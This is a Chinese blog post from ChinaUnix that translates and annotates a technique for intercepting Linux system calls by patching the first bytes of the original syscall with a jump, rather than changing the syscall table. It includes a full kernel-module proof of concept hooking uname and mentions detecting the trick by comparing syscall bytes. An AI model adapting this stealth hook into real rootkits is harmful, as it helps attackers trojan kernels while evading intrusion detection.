Chinaunix首页 | 论坛 | 博客

举世无双的学习之路

首页 |  博文目录 |  关于我

wxju168

  • 博客访问: 1912775
  • 博文数量: 383
  • 博客积分: 10011
  • 博客等级: 上将
  • 技术积分: 4061
  • 用 户 组: 普通用户
  • 注册时间: 2008-04-24 18:53
文章分类

全部博文(383)

文章存档

2011年(1)

2010年(9)

2009年(276)

2008年(97)

我的朋友
最近访客
推荐博文
相关博文
不用syscall table 的方法来截获系统调用的方法的分析

分类: LINUX

2008-12-08 14:38:08

    本文描述了一种可以不利用syscall table来截获系统调用的方法(在linux的实现),它可以被用来

利用截获系统调用表注册或者trojan系统调用来逃避入侵监测系统。它还是一个简单的发现攻击行为的方

法。最基本的前提是攻击时需要改变旧的系统调用来跳转到新的系统调用,因此控制权交给新的系统调用

并且syscall table并没有变化。但,如果只有仅仅这些的话,那么原来的系统调用就很糟糕了,并且执

行起来会非常危险,所以当系统调用创建的时候原来的code必须被保存下来。原来的code被跳转指针替代

并且系统调用看起来和平常一样正常运行。在这之后,跳转指针会再次放置等待下次使用。要发现这种攻

击手段必须非常小心仔细地比较原系统调用的头几个字节来判断系统调用是否被截获。

********************************************************************************************
    译者注:我们以前的截获实现是通过给syscall table注册一个new的sys call来截获,现在,新的方

法是我们来修改旧的系统调用的code来实现截获,加一个跳转指针指向new的sys call,并不需要添加注册

到syscall table中,从而可以逃避管理员的监测。                  

********************************************************************************************

以下是2.0.x的测试代码,我加以注释帮助大家理解:

-- stealth_syscall.c (Linux 2.0.35)

#include
#include
#include
#include
#include
#include
#include
#include

#define SYSCALL_NR __NR_uname

static char syscall_code[7];
static char new_syscall_code[7] =
        "\xbd\x00\x00\x00\x00"  /*      movl   $0,%ebp  */
        "\xff\xe5"              /*      jmp    *%ebp    */   /*定义新的sys_code,其实就是一个跳转指令*/
;

extern void *sys_call_table[];

void *_memcpy(void *dest, const void *src, int size)/*这个应该很熟悉了,在2.0.x内核中定义一

个数据传递函数*/
{
        const char *p = src;
        char *q = dest;
        int i;

        for (i = 0; i < size; i++) *q++ = *p++;

        return dest;
}

/*
        uname
*/

int new_syscall(struct new_utsname *buf) /*定义新的uname系统调用*/
{
        printk(KERN_INFO "UNAME - Silvio Cesare\n");
        _memcpy(
                sys_call_table[SYSCALL_NR], syscall_code,
                sizeof(syscall_code)
        );
        ((int (*)(struct new_utsname *))sys_call_table[SYSCALL_NR])(buf);/*正常运行系统调用

*/
        _memcpy(
                sys_call_table[SYSCALL_NR], new_syscall_code,/*等待再次使用*/
                sizeof(syscall_code)
        );
}

int init_module(void) /*加载*/
{
        *(long *)&new_syscall_code[1] = (long)new_syscall;  /*把新的syscall_code指向

new_syscall*/
        _memcpy(
                syscall_code, sys_call_table[SYSCALL_NR],   /*保存原来的syscall_code*/
                sizeof(syscall_code)
        );
        _memcpy(
                sys_call_table[SYSCALL_NR], new_syscall_code, /*好,注入新的code!实现截获*/
                sizeof(syscall_code)
        );
        return 0;
}

void cleanup_module(void) /*卸载*/
{
        _memcpy(
                sys_call_table[SYSCALL_NR], syscall_code,   /*重新注入新的syscall_code*/
                sizeof(syscall_code)
        );
}
阅读(627) | 评论(0) | 转发(0) |
0

上一篇:2.6.8内核中通过模块添加系统调用(不用编译内核)

下一篇:系统调用及参数传递过程

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6